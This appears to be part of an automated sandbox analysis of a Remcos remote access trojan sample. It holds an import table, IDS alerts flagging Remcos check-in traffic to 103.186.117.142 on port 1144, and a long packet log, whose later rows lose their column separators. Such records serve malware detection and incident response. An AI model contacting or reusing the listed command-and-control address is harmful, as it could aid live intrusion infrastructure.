user32.dll | GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
kernel32.dll | lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
user32.dll | CreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgItem, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, 
EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                                                                                  kernel32.dllSleep
                                                                                                                                                  oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                                                                                                                                  comctl32.dllImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                                                                                                                                                  comdlg32.dllGetSaveFileNameA, GetOpenFileNameA
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
04/24/24-07:20:40.804567 | TCP | 2032776 | ET TROJAN Remcos 3.x Unencrypted Checkin | 49711 | 1144 | 192.168.2.8 | 103.186.117.142
04/24/24-07:23:03.835490 | TCP | 2032777 | ET TROJAN Remcos 3.x Unencrypted Server Response | 1144 | 49711 | 103.186.117.142 | 192.168.2.8
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 24, 2024 07:20:30.196149111 CEST | 49705 | 443 | 192.168.2.8 | 13.107.139.11
Apr 24, 2024 07:20:30.196193933 CEST | 443 | 49705 | 13.107.139.11 | 192.168.2.8
Apr 24, 2024 07:20:30.196283102 CEST | 49705 | 443 | 192.168.2.8 | 13.107.139.11
Apr 24, 2024 07:20:30.201636076 CEST | 49705 | 443 | 192.168.2.8 | 13.107.139.11
Apr 24, 2024 07:20:30.201677084 CEST | 443 | 49705 | 13.107.139.11 | 192.168.2.8
Apr 24, 2024 07:20:30.201735020 CEST | 49705 | 443 | 192.168.2.8 | 13.107.139.11
Apr 24, 2024 07:20:30.238039970 CEST | 49706 | 443 | 192.168.2.8 | 13.107.139.11
Apr 24, 2024 07:20:30.238161087 CEST | 443 | 49706 | 13.107.139.11 | 192.168.2.8
Apr 24, 2024 07:20:30.238246918 CEST | 49706 | 443 | 192.168.2.8 | 13.107.139.11
Apr 24, 2024 07:20:30.241255999 CEST | 49706 | 443 | 192.168.2.8 | 13.107.139.11
Apr 24, 2024 07:20:30.241286993 CEST | 443 | 49706 | 13.107.139.11 | 192.168.2.8
Apr 24, 2024 07:20:30.781940937 CEST | 443 | 49706 | 13.107.139.11 | 192.168.2.8
Apr 24, 2024 07:20:30.782135963 CEST | 49706 | 443 | 192.168.2.8 | 13.107.139.11
Apr 24, 2024 07:20:30.787621021 CEST | 49706 | 443 | 192.168.2.8 | 13.107.139.11
Apr 24, 2024 07:20:30.787628889 CEST | 443 | 49706 | 13.107.139.11 | 192.168.2.8
Apr 24, 2024 07:20:30.788009882 CEST | 443 | 49706 | 13.107.139.11 | 192.168.2.8
Apr 24, 2024 07:20:30.833478928 CEST | 49706 | 443 | 192.168.2.8 | 13.107.139.11
Apr 24, 2024 07:20:30.841881037 CEST | 49706 | 443 | 192.168.2.8 | 13.107.139.11
Apr 24, 2024 07:20:30.884110928 CEST | 443 | 49706 | 13.107.139.11 | 192.168.2.8
Apr 24, 2024 07:20:32.000521898 CEST | 443 | 49706 | 13.107.139.11 | 192.168.2.8
Apr 24, 2024 07:20:32.000597000 CEST | 443 | 49706 | 13.107.139.11 | 192.168.2.8
Apr 24, 2024 07:20:32.000684023 CEST | 49706 | 443 | 192.168.2.8 | 13.107.139.11
Apr 24, 2024 07:20:32.002690077 CEST | 49706 | 443 | 192.168.2.8 | 13.107.139.11
Apr 24, 2024 07:20:32.002706051 CEST | 443 | 49706 | 13.107.139.11 | 192.168.2.8
Apr 24, 2024 07:20:36.333086967 CEST | 49708 | 443 | 192.168.2.8 | 13.107.139.11
Apr 24, 2024 07:20:36.333137035 CEST | 443 | 49708 | 13.107.139.11 | 192.168.2.8
Apr 24, 2024 07:20:36.333205938 CEST | 49708 | 443 | 192.168.2.8 | 13.107.139.11
Apr 24, 2024 07:20:36.333434105 CEST | 49708 | 443 | 192.168.2.8 | 13.107.139.11
Apr 24, 2024 07:20:36.333478928 CEST | 443 | 49708 | 13.107.139.11 | 192.168.2.8
Apr 24, 2024 07:20:36.333754063 CEST | 49708 | 443 | 192.168.2.8 | 13.107.139.11
Apr 24, 2024 07:20:36.412733078 CEST | 49709 | 443 | 192.168.2.8 | 13.107.139.11
Apr 24, 2024 07:20:36.412821054 CEST | 443 | 49709 | 13.107.139.11 | 192.168.2.8
Apr 24, 2024 07:20:36.413134098 CEST | 49709 | 443 | 192.168.2.8 | 13.107.139.11
Apr 24, 2024 07:20:36.414189100 CEST | 49709 | 443 | 192.168.2.8 | 13.107.139.11
Apr 24, 2024 07:20:36.414222956 CEST | 443 | 49709 | 13.107.139.11 | 192.168.2.8
Apr 24, 2024 07:20:36.932493925 CEST | 443 | 49709 | 13.107.139.11 | 192.168.2.8
Apr 24, 2024 07:20:36.932601929 CEST | 49709 | 443 | 192.168.2.8 | 13.107.139.11
Apr 24, 2024 07:20:36.934453011 CEST | 49709 | 443 | 192.168.2.8 | 13.107.139.11
Apr 24, 2024 07:20:36.934474945 CEST | 443 | 49709 | 13.107.139.11 | 192.168.2.8
Apr 24, 2024 07:20:36.934710026 CEST | 443 | 49709 | 13.107.139.11 | 192.168.2.8
Apr 24, 2024 07:20:36.977547884 CEST | 49709 | 443 | 192.168.2.8 | 13.107.139.11
Apr 24, 2024 07:20:36.988152027 CEST | 49709 | 443 | 192.168.2.8 | 13.107.139.11
Apr 24, 2024 07:20:37.036120892 CEST | 443 | 49709 | 13.107.139.11 | 192.168.2.8
Apr 24, 2024 07:20:37.885379076 CEST | 443 | 49709 | 13.107.139.11 | 192.168.2.8
Apr 24, 2024 07:20:37.885600090 CEST | 443 | 49709 | 13.107.139.11 | 192.168.2.8
Apr 24, 2024 07:20:37.885699034 CEST | 49709 | 443 | 192.168.2.8 | 13.107.139.11
Apr 24, 2024 07:20:37.920790911 CEST | 49709 | 443 | 192.168.2.8 | 13.107.139.11
Apr 24, 2024 07:20:37.920790911 CEST | 49709 | 443 | 192.168.2.8 | 13.107.139.11
Apr 24, 2024 07:20:37.920845985 CEST | 443 | 49709 | 13.107.139.11 | 192.168.2.8
Apr 24, 2024 07:20:37.920881033 CEST | 443 | 49709 | 13.107.139.11 | 192.168.2.8
Apr 24, 2024 07:20:40.414899111 CEST | 49711 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:40.803522110 CEST | 1144 | 49711 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:40.803760052 CEST | 49711 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:40.804567099 CEST | 49711 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:41.273894072 CEST | 1144 | 49711 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:41.312289000 CEST | 1144 | 49711 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:41.314066887 CEST | 49711 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:41.752518892 CEST | 1144 | 49711 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:41.755002022 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:41.801486969 CEST | 49711 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:41.890260935 CEST | 49713 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:41.945225000 CEST | 49714 | 80 | 192.168.2.8 | 178.237.33.50
Apr 24, 2024 07:20:42.165534973 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:42.165755033 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:42.165823936 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:42.250741005 CEST | 80 | 49714 | 178.237.33.50 | 192.168.2.8
Apr 24, 2024 07:20:42.250909090 CEST | 49714 | 80 | 192.168.2.8 | 178.237.33.50
Apr 24, 2024 07:20:42.251774073 CEST | 49714 | 80 | 192.168.2.8 | 178.237.33.50
Apr 24, 2024 07:20:42.264514923 CEST | 1144 | 49713 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:42.264627934 CEST | 49713 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:42.265050888 CEST | 49713 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:42.562464952 CEST | 80 | 49714 | 178.237.33.50 | 192.168.2.8
Apr 24, 2024 07:20:42.562532902 CEST | 49714 | 80 | 192.168.2.8 | 178.237.33.50
Apr 24, 2024 07:20:42.581983089 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:42.582077026 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:42.582097054 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:42.582117081 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:42.582226038 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:42.582261086 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:42.603140116 CEST | 49711 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:42.653491974 CEST | 1144 | 49713 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:42.653512955 CEST | 1144 | 49713 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:42.653597116 CEST | 49713 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:42.653652906 CEST | 49713 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:42.976016998 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:42.976085901 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:42.976145029 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:42.976186037 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:42.976188898 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:42.976227045 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:42.976229906 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:42.976264954 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:42.976301908 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:42.976309061 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:42.976341009 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:42.976385117 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:43.061500072 CEST | 1144 | 49713 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:43.061532021 CEST | 1144 | 49713 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:43.061611891 CEST | 49713 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:43.061661959 CEST | 1144 | 49713 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:43.061875105 CEST | 1144 | 49713 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:43.061878920 CEST | 49713 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:43.061918020 CEST | 1144 | 49713 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:43.061938047 CEST | 49713 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:43.061980963 CEST | 1144 | 49713 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:43.062017918 CEST | 49713 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:43.062032938 CEST | 49713 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:43.062143087 CEST | 1144 | 49713 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:43.062196016 CEST | 49713 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:43.062230110 CEST | 1144 | 49713 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:43.062278032 CEST | 49713 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:43.070317984 CEST | 1144 | 49711 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:43.337644100 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:43.337667942 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:43.337738037 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:43.337738991 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:43.337790966 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:43.337821007 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:43.337862015 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:43.337963104 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:43.337994099 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:43.338449001 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:43.338466883 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:43.338484049 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:43.338498116 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:43.338500023 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:43.338516951 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:43.338534117 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
Apr 24, 2024 07:20:43.338536024 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:43.338553905 CEST | 1144 | 49712 | 103.186.117.142 | 192.168.2.8
Apr 24, 2024 07:20:43.338567972 CEST | 49712 | 1144 | 192.168.2.8 | 103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.338576078 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.338593960 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.338608027 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.338651896 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.338679075 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.459539890 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.459706068 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.459722996 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.459737062 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.459753036 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.459830046 CEST497131144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.459908962 CEST497131144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.459964991 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.460144043 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.460159063 CEST497131144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.460194111 CEST497131144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.460336924 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.460387945 CEST497131144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.460529089 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.460602045 CEST497131144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.460616112 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.460656881 CEST497131144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.460922003 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.460973978 CEST497131144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.461007118 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.461287975 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.559995890 CEST8049714178.237.33.50192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.560159922 CEST4971480192.168.2.8178.237.33.50
                                                                                                                                                  Apr 24, 2024 07:20:43.714111090 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.714202881 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.714221954 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.714241028 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.714260101 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.714268923 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.714289904 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.714294910 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.714349031 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.714356899 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.714422941 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.714469910 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.714812040 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.714833021 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.714874029 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.714943886 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.714987993 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.715028048 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.715080976 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.715147972 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.715176105 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.715184927 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.715219975 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.715251923 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.715308905 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.715368986 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.715406895 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.715572119 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.715598106 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.715634108 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.715652943 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.715708971 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.715744972 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.715781927 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.715841055 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.715873957 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.715989113 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.716078997 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.716109037 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.716135979 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.716316938 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.716350079 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.716401100 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.716466904 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.716500998 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.716545105 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.716629028 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.716660023 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.830142975 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.830172062 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.830187082 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.830202103 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.830216885 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.830327988 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.830403090 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.830579042 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.830737114 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.830919027 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.831114054 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.831382990 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.831655025 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.831957102 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.832124949 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.832370043 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.832454920 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.846796036 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.846868992 CEST497131144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.100356102 CEST114449712103.186.117.142192.168.2.8
